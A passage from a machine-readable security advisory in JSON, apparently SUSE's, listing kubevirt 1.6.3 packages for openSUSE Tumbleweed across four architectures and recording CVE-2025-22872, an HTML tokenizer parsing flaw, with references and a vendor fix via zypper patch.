"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
